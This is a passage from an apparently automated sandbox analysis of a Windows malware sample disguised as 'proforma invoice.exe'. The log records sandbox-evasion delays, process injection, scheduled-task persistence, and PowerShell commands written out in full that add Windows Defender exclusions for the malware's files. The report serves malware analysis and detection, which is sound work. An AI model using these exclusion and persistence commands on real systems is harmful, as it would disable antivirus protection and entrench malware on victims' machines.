Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96266	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96157	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96032	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95907	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95782	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95672	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95563	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95438	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95313	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95188	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 95063	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94954	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94829	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94704	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94579	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94454	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94329	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 94204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99874
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99546
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99432
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99202
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 99093
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98546
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98209
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 98078
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97859
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97750
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97640
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97528
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97421
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97312
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97203
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 97093
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96975
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96859
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96749
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96640
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96531
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96421
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96312
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96203
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 96093
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95984
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95874
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95765
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95656
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95546
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95410
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95281
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95171
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 95062
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 94953
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 94843
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 94732
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 94624
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 94514

Source: CGWlZD.exe, 0000000E.00000002.2578603307.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: proforma invoice.exe, 00000009.00000002.2590441321.0000000006A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ`0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\proforma invoice.exe	Memory written: C:\Users\user\Desktop\proforma invoice.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory written: C:\Users\user\AppData\Roaming\CGWlZD.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process created: C:\Users\user\AppData\Roaming\CGWlZD.exe "C:\Users\user\AppData\Roaming\CGWlZD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Users\user\Desktop\proforma invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
